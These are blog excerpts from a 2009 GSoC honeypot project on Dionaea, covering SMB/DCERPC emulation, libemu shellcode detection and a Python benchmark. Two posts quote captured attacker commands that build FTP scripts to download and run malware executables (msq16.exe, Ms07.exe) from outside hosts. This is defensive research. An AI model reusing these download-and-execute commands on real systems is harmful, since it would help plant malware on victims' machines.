GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots

Iteolih: RPC vulnerability implementation party

mark.schloesser — Tue, 25 Aug 2009 11:33:00 -0500

The Dionaea honeypot got more and more mature during the last weeks. As Markus blogged in Iteolih: Miles and More the software is now able to detect shellcode via libemu and generates a nice shellcode profile out of this.

The SMB / DCERPC implementation also got fairly mature and is now able to cope with all packet types and also most caveats and differences of implementations in exploits. As I registered more and more RPC vulnerabilities in the module, it was definitely time to give libemu something to eat! :)

Giraffe Chapter

Iteolih: Miles and More

markus.koetter — Tue, 11 Aug 2009 07:10:33 -0500

We got a new milestone due:
10.08.2009

thread-pool works
stream recording works
shellcode detection using libemu works
shellcode emulation using libemu works
compiles on linux&openbsd

An exploit taken from a public repository, run against the software, is detected and emulated.
To shorten things, basically all required points are hit with current svn.
So, given the time we just saved, some words about how it works.

GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots

Iteolih: malicious ftp services

markus.koetter — Sun, 26 Jul 2009 08:28:13 -0500

Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:

WinExec("cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")
ExitThread(0)

As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.

GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots

Iteolih: If you can't touch it ...

markus.koetter — Tue, 21 Jul 2009 08:17:48 -0500

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.

cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe

GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots

Iteolih: SMB/RPC efforts

mark.schloesser — Sat, 11 Jul 2009 10:23:49 -0500

During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!).

SMB / CIFS is a huge protocol with several protocol versions and a lot of message types. The CIFS technical reference and the Implementing CIFS book have been constant companions for me since the beginning of the project.

Giraffe Chapter

Iteolih: Is this worth your time?

markus.koetter — Fri, 05 Jun 2009 17:37:36 -0500

Hello,
due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as uniq abbrevitation. Things are rolling for the project, writing code started, a basic homepage with instructions how to compile/use it was created.
I even had the plan to write about it once or twice, finish something in the code, write about it. When I was done with the code, I got the idea, writing about it was not worth your time.

GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots

Iteolih: Python Benchmark

markus.koetter — Sun, 24 May 2009 11:57:02 -0500

As the plan is to embedd python as scripting language into the honeypot, I ran a benchmark on a testsuite. The 'testsuite' is a c core which accepts connections, and allows python to deal with the input. The protocol used for benchmarking is http, the service serves a non static html page.
I tested

2.6.2_(release26-maint,_Apr_19_2009,_02:15:38)
3.0.1+_(r301:69556,_Apr_15_2009,_17:22:45)_
3.1a1+_(py3k,_Mar_30_2009,_02:02:26)_

To benchmark, I ran the apache benchmark tool ab

Giraffe Chapter